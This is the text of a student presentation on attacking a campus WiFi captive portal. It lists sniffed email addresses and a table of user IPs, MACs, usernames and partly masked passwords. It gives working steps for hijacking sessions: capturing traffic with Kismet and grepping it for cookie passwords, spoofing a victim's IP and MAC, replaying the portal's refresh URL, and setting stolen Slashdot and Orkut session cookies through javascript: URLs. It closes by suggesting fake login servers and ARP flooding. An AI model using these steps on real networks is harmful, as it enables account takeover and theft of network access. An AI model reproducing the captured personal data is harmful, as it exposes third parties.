Smit WiFi_2

Down the rabbit-hole

a sneak peek at the SMIT-WiFi implementation

Amit SaraffAshish Shekhar

Tools Used

• Nmap – network scanner• Wireshark / Ethereal - packet analyzer• Kismet – wireless sniffer• BurpSuite – proxy (http header modifier)• Firefox – web-browser

– Live HTTP Headers– User Agent Switcher– Tamper Data– View Cookie CS– NoScript

• Unix tools – wget, curl, ssh, ifconfig etc.• Intel Centrino-based laptop running

Slackware 9

Brief Overview

• IP Range :- 172.16.183.0/22• WEP / WPA – no (yes !!)• 4 different essid's -

– SMITWiFi1– SMITWiFi2– SMITWiFi3– SMITWiFi4– different essid's / same

channel ??

Brief Overview (cont..)

• 172.16.183.1 – router / DNS resolver / authenticator

• 172.16.183.2 – 802.11b Access Point

• 172.16.183.3 – D-link DWL-900 AP+ (standard 802.11bg ap)

• 172.16.183.4 – (new) Another access-point ?

Initial Monitoring

• E-mail accounts– apoorv13@gmail.com– josepjaycox@asmt.com– divye_kapoor@hotmail.com– mark@astro.queensu.com– arnab522@rediffmail.com– minamul@hotmail.com– asadhamidi@hotmail.com– vikved@gmail.com

Initial Monitoring (cont..)

• and web addresses– www.orkut.com– www.cisco.com– www.wipro.com– www.musicgamesrefer.com– www.grisoft.com– www.yahoo.com– And some more orkut !!

But that's not what we are looking for !!

Wall of Sheep

IP MAC User Password172.16.183.15 00:12:f0:db:ef:6f d205a m_-_-i172.16.183.23 00:12:f0:64:0a:67 g205a b_-_i172.16.183.78 00:13:ce:7b:d7:9b d108a 1_3172.16.183.116 00:16:ce:54:69:48 b206a j_-n172.16.183.117 00:12:f0:56:b7:3f k205a n_-_-_-w172.16.183.149 00:15:00:22:c4:0f l205a p_-_-_-_4172.16.183.155 00:13:02:43:2b:0d r305a r_-_-_a172.16.183.180 00:12:f0:51:3b:e0 j301a h_-_-_-a

** and this is just a small part of the list

How about some user account details?

So how did this happen ?

172.16.183.1 – Authentication Server

Talk about multi-platform support

User – Agent Switcher to the rescue

Background magic – how it really works

How hard is it?

• Log the network traffic using Kismet• And run - • 'strings Kismet*.dump|grep Cookie|egrep “_Pass=[a-zA-Z0-9]+;” '

• to get :Cookie: _UserName=m301a; _Pass=123;

JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293

Cookie: _UserName=r703a; _Pass=manisha;JSESSIONID=2914445C961B072A73498FDCC1CEB9AE

But that isn't very ethical

• Problem – How to get access to the internet without compromising another's account ?

• Solution – Study the entire process and find a work-around.

Brief Introduction to Cookies

No not these “cookies”

So what are they ?

• Parcels of text sent by a server to a web-browser and then sent unchanged back by the browser each time it accesses the server.

• Used for authenticating, tracking and maintaining specific information about users.

• We saw an example 2-3 slides back.– For those who “missed it” here it is again :

Cookie:_UserName=m301a;_Pass=123;JSESSIONID=975DCC46FE52BC0A3CEFDA8E5

68A7293

How do they help?

• The SMIT server sets a cookie on each client it authenticates.

• Refreshes it every 180 seconds.• How do I then get this cookie ?• And how will it help even if I do

manage to capture it ?

Step 1

Find active hosts on the network:enter 'Kismet'

Step 1 (cont..)

Step 2

Select an active host and note parametersie. IP Address and MAC address.

Step 2 (cont..)

Change settings locally to match host about to be compromised.

For eg :ifconfig eth1 172.16.183.209 hw ether 00:13:02:C1:28:D4

route add default gw 172.16.183.1

Step 3

• Fire up your browser – Firefox in our case.

• Type in the following URL :

http://172.16.183.1/24online/webpages/clientlogin.jsp?loginstatus=true&logoutstatus=null&message=&liverequesttime=180&livemessage=null&url=&isAccessDenied=null&fromlogout=null

• This acts as a 'refresh' command to the server which replies back with the validated cookie.

..to get

..and we are online

Step 3 (cont..)

• What this does :– Sets you up with the “cookie”– Refreshes itself every 180 seconds– Voila, you have free internet access (until

the guy logs off / you log him off)

• Node goes offline ?– Rinse and repeat the entire process with

another IP.

Return to cookie-land

• Authentication mechanisms– We just saw an abuse of the implicit trust

mechanism guaranteed by cookies– But that was local– Can it be extended to other sites too?

Presenting Slashdot

• Popular technology portal.• News site for anything regarding

Technology / Linux / Politics / Science / YRO – Your Rights Online and more.

• Uses HTTP-POST mechanism for sending authentication data.

The main page

Login page

Cookie

Exploit -

• To authenticate as that user simply capture the incoming cookie

• Then in the address-bar type in :

javascript:document.cookie='user=609178::Ik2zsyezqK6AIER7rLuyD7; Domain=.slashdot.org;

Path=/';

Result ?

So what ?

But then that is hardly any sweat !!

Moving on - orkut.com

• What is orkut ?– Social networking site.– Online community to meet new

people and keep in touch with old ones.

– Now part of the Google empire.– On in “atleast” 15 of the 20 or

so computers in the campus cyber-cafe at any time of the day.

Main page.

First observations.

• Note – The address-bar is yellow and there is a

lock-sign on the taskbar.– What it means :

• Site uses Secure-HTTP (Port 443 / https)• Certificate for validation (AES-256 bit

encryption)• Trusted certificate issuer – Thawte Consulting

cc.

– Actual login frame URL :https://www.google.com/accounts/ServiceLoginBox?

service=orkut&nui=2&uilel=1&skipvp age=true&msg%3D0%26page%3Dhttp%253A%252F%252Fwww.orkut.com%252F&followup=https%3A%2F%2Fwww.orkut.com%2FGLogin.aspx&hl=en-US

In other words – that information is definitely not being cracked anytime

soon.

Cookies, again?

• Cookie generated on login :

Cookies, again ? (cont..)

• 2 cookies set by the orkut domain– First one seems to be a user preference

cookie– Second one is for timezone (??)

Cookie (1)

• Question : Does Cookie 1 alone do the trick then ?

• Solution : Grab another cookie and check.

Back to kismet dumps

• Hunt for a cookie in the previous gathered logs.

strings Kismet-*dump|grep Cookie|greporkut -i

• To get :Cookie:

orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:

Set this cookie

javascript:document.cookie='

orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:; Domain=.orkut.com;

Path=/';

To get :

Notice self-post!

Future possibilities ?

• Setup a HTTP server and masquerade as 172.16.183.1 in order to capture logins.

• Attack the hardware itself(vulnerabilities in the server / access-points).

• Ban certain clients from access (arp-flooding).

• Put the laptop in “Master” mode to route traffic through it.

Thank you ___________________

Questions ?